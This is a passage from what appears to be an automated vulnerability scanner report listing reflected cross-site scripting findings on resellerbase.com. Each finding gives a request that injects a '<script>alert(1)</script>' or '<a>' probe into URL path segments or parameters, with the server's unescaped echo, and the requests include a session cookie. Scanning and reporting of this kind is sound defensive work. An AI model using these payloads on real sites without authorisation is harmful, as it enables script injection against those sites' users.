The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76516<script>alert(1)</script>9d5e6a86a22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos76516<script>alert(1)</script>9d5e6a86a22/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos76516<script>alert(1)</script>9d5e6a86a22/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4842. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 20e00<script>alert(1)</script>d24fa128aca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images20e00<script>alert(1)</script>d24fa128aca/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images20e00<script>alert(1)</script>d24fa128aca/rating/ was not found on this server.</p>
...[SNIP]...

2.4843. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e5ba9<script>alert(1)</script>99c00fe4b03 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/ratinge5ba9<script>alert(1)</script>99c00fe4b03/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/ratinge5ba9<script>alert(1)</script>99c00fe4b03/ was not found on this server.</p>
...[SNIP]...

2.4844. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eb841<script>alert(1)</script>fe516b13485 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/?eb841<script>alert(1)</script>fe516b13485=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/?eb841<script>alert(1)</script>fe516b13485=1 was not found on this server.</p>
...[SNIP]...

2.4845. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac56a<script>alert(1)</script>ec884e2a404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationac56a<script>alert(1)</script>ec884e2a404/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationac56a<script>alert(1)</script>ec884e2a404/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4846. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 106dc<script>alert(1)</script>092b610dd12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes106dc<script>alert(1)</script>092b610dd12/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes106dc<script>alert(1)</script>092b610dd12/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4847. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9346<script>alert(1)</script>d49ef4831b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmosb9346<script>alert(1)</script>d49ef4831b1/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmosb9346<script>alert(1)</script>d49ef4831b1/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4848. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 282db<script>alert(1)</script>d09435b8890 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images282db<script>alert(1)</script>d09435b8890/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images282db<script>alert(1)</script>d09435b8890/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4849. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2778a<script>alert(1)</script>a9a0cf7aaf5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating2778a<script>alert(1)</script>a9a0cf7aaf5/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating2778a<script>alert(1)</script>a9a0cf7aaf5/5.gif was not found on this server.</p>
...[SNIP]...

2.4850. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f6e21<script>alert(1)</script>02b64272d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/5.giff6e21<script>alert(1)</script>02b64272d1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/5.giff6e21<script>alert(1)</script>02b64272d1 was not found on this server.</p>
...[SNIP]...

2.4851. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bac4<script>alert(1)</script>2b9596dde1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/5.gif?1bac4<script>alert(1)</script>2b9596dde1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/5.gif?1bac4<script>alert(1)</script>2b9596dde1b=1 was not found on this server.</p>
...[SNIP]...

2.4852. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68448<script>alert(1)</script>31aba6339bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation68448<script>alert(1)</script>31aba6339bb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation68448<script>alert(1)</script>31aba6339bb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4853. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c733a<script>alert(1)</script>ce47fbbd3ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themesc733a<script>alert(1)</script>ce47fbbd3ea/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themesc733a<script>alert(1)</script>ce47fbbd3ea/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4854. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 320ed<script>alert(1)</script>ec99da40cb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos320ed<script>alert(1)</script>ec99da40cb4/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos320ed<script>alert(1)</script>ec99da40cb4/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4855. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b9176<script>alert(1)</script>17d4b0c740b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/imagesb9176<script>alert(1)</script>17d4b0c740b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/imagesb9176<script>alert(1)</script>17d4b0c740b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4856. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f16ff<script>alert(1)</script>a9bffa82e26 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/ratingf16ff<script>alert(1)</script>a9bffa82e26/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/ratingf16ff<script>alert(1)</script>a9bffa82e26/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4857. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5eae3<script>alert(1)</script>50371247eb2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php5eae3<script>alert(1)</script>50371247eb2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php5eae3<script>alert(1)</script>50371247eb2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4858. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3dade<a>d125ebe00bd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3dade<a>d125ebe00bd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3dade<a>d125ebe00bd&opt=2 was not found on this server.</p>
...[SNIP]...

2.4859. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload dd195<a>b06b45bf5c6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...dd195<a>b06b45bf5c6&Submit3=Search&opt=2 HTTP/1.1
